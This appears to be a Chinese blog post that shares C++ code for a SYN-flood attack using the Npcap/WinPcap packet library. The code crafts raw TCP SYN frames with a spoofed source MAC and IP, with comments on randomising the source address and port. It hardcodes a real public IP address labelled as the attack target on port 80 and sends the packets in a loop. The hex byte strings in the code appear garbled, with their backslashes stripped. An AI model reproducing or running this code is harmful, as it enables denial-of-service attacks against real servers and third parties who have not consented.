1、来自:winpcap实现syn攻击 - 125096 - CSDN博客.html(https://blog.csdn.net/qq125096885/article/details/51784524)
2、我的代码:(代码 用Npcap来跑,基本不用修改)(Win7x64、vs2017、使用 x86编译的Debug版本)
// Npcap_01.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include <iostream> #pragma warning(disable : 4996) //int main() //{ // std::cout << "Hello World! "; //} //#define _W64 //#define HAVE_REMOTE #include<stdio.h> #include<pcap.h> #include<winsock2.h> #include <time.h> //#include "remote-ext.h" #pragma comment(lib,"wpcap.lib") #pragma comment(lib,"WS2_32.lib") #pragma pack(push,1) typedef struct _TCP_SYN { unsigned char DstMAC[6]; // 目的mac地址 unsigned char SrcMAC[6]; // 源mac地址 unsigned char OtherData[12]; unsigned short Header_ChechSum; // 校验和 unsigned int SrcIP; // Source IP address unsigned int DstIP; // Destination IP address unsigned short SrcPort; // Source IP Port unsigned short DstPort; // Destination IP Port,一般为80端口,值为0x5000 unsigned char Ohters[16]; unsigned short pak_checksum; unsigned char OtherLast[1]; }TCP_SYN, *PTCP_SYN; #pragma pack(pop) unsigned char bufData[] = "x00x25x86x27xd1x22x90x2bx34x60xbdx44x08x00x45x00" "x00x34x61xdcx40x00x80x06x71x83xc0xa8x01x6ax7axe4" "xeax6dx0bx0cx00x50xb9xc2xf5x06x00x00x00x00x80x02" "xffxffx8dx8dx00x00x02x04x05xb4x01x03x03x01x01x01" "x04x02"; // clac the header's check sum unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum = 0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >> 16); return (unsigned short)(~cksum); } int main(int argc, char* argv[]) { pcap_if_t *alldevs; pcap_if_t *seldev; pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; srand(time(0)); /* 获取本机设备列表 */ if (pcap_findalldevs(&alldevs, errbuf) == -1) { fprintf(stderr, "Error in pcap_findalldevs: %s ", errbuf); exit(1); } // 找到一个有ip的就当有连网的网卡了 for (seldev = alldevs; seldev != NULL; seldev = seldev->next) { pcap_addr* pcapaddr = NULL; for (pcapaddr = seldev->addresses; pcapaddr != NULL; pcapaddr = pcapaddr->next) { //if (pcapaddr->addr->sa_data[2] != ' ' && pcapaddr->addr->sa_data[3] != ' ') //{ // break; //} printf("seldev->name : %s ", seldev->name); for (int i = 0; i < 14; i++) printf("%d ", (UCHAR)pcapaddr->addr->sa_data[i]); printf(" "); //printf("%d, %d ", pcapaddr->addr->sa_data[2], pcapaddr->addr->sa_data[3]); if ((UCHAR)pcapaddr->addr->sa_data[2] == 172 && (UCHAR)pcapaddr->addr->sa_data[3] == 16) { printf("will break; "); break; } } if (pcapaddr != NULL) break; printf(" "); } if (seldev == NULL) { fprintf(stderr, "Can not find network! "); exit(1); } printf("seldev->name : %d ", seldev->name); for (int i = 0; i < 14; i++) printf("%d ", (UCHAR)seldev->addresses->addr->sa_data[i]); printf(" "); /* 打开这个输出设备 */ if ((fp = pcap_open(seldev->name, // 设备名 100, // 要捕获的部分 (只捕获前100个字节) PCAP_OPENFLAG_PROMISCUOUS, // 混杂模式 1000, // 读超时时间 NULL, // 远程机器验证 errbuf // 错误缓冲 )) == NULL) { fprintf(stderr, " Unable to open the adapter. %s is not supported by WinPcap ", alldevs->name); return -1; } // 修改源MAC、IP地址 , 并修改首部校验和 PTCP_SYN SynData = (PTCP_SYN)bufData; while (1) { //memcpy(SynData->SrcMAC, "x01x01x01x01x01x01", 6); // 源MAC地址 01:01:01:01:01:01 memcpy(SynData->SrcMAC, "x04xd4xc4x59x7ax1c", 6);// 04-D4-C4-59-7A-1C memcpy(SynData->DstMAC, "x04xf9x38xa6xd7xcb", 6);// 04-f9-38-a6-d7-cb SynData->DstIP = inet_addr("39.156.69.79"); // 攻击的目标 SynData->DstPort = htons(80); // 目标端口80 SynData->SrcIP = inet_addr("172.16.19.181");// (unsigned int)rand(); // 源IP地址随机产生 SynData->SrcPort = htons(80);// (unsigned short)rand() % 100 + 1024; // 源端口随机产生 SynData->Header_ChechSum = 0; SynData->Header_ChechSum = checksum((unsigned short*)&bufData[14], 20); // 计算checksum // printf("%d ", SynData->Header_ChechSum); /* 发送数据包 */ // (wireshark 黑底红字为 校验和错误 的包). if (pcap_sendpacket(fp, bufData, sizeof(bufData) - 1) != 0) { fprintf(stderr, " Error sending the packet: ", pcap_geterr(fp)); return -1; } system("pause"); //break; } /* 释放设备列表 */ pcap_freealldevs(alldevs); return 0; }
3、
4、
5、